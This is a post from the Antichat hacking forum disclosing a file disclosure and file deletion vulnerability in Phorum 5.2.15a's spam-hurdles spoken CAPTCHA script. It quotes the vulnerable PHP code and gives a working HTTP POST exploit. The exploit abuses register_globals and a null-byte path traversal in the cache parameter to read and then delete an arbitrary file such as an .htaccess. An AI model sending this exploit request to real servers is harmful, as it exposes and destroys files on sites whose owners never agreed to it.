Форум АНТИЧАТ - [Обзор уязвимостей Phorum]

Phorum 5.2.15a File Disclosure + File Deletion Vulnerability

#12

23.05.2010, 13:42

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

Провел на форуме:
3217552

Репутация: 1668

Отправить сообщение для RulleR с помощью ICQ

Отправить сообщение для RulleR с помощью Yahoo

Phorum 5.2.15a File Disclosure + File Deletion Vulnerability

Phorum version 5.2.15a

File Disclosure + File Deletion

Vuln file: /mods/spamhurdles/captcha/spoken_captcha.php

PHP код:


		
			
/*...*/

    global $PHORUM;

    $conf = $PHORUM["mod_spamhurdles"];



    if ($conf["spoken_captcha"] && file_exists($conf["flite_location"]) &&

        isset($PHORUM["SPAMHURDLES"]["captcha"]["spoken_text"]))

    {

/*...*/

        $tmpfile = "{$PHORUM["cache"]}/spokencaptcha_{$key}.wav";

/*...*/

        if (file_exists($tmpfile) and filesize($tmpfile) > 0) {

            header("Content-Type: audio/x-wav");

            header("Content-Disposition: attachment; filename=captchacode.wav");

            header("Content-Length: " . filesize($tmpfile)); 

            readfile($tmpfile);

            unlink($tmpfile);

            exit(0);

/*...*/

Need: magic_quotes = Off && register_globals = On
Exploit:

Код:

POST http://[host]/[path]/mods/spamhurdles/captcha/spoken_captcha.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

PHORUM[mod_spamhurdles][spoken_captcha]=1&PHORUM[mod_spamhurdles][flite_location]=spoken_captcha.php&PHORUM[SPAMHURDLES][captcha][spoken_text]=1&PHORUM[cache]=../../../scripts/.htaccess%00

__________________
Avant que l'ombre...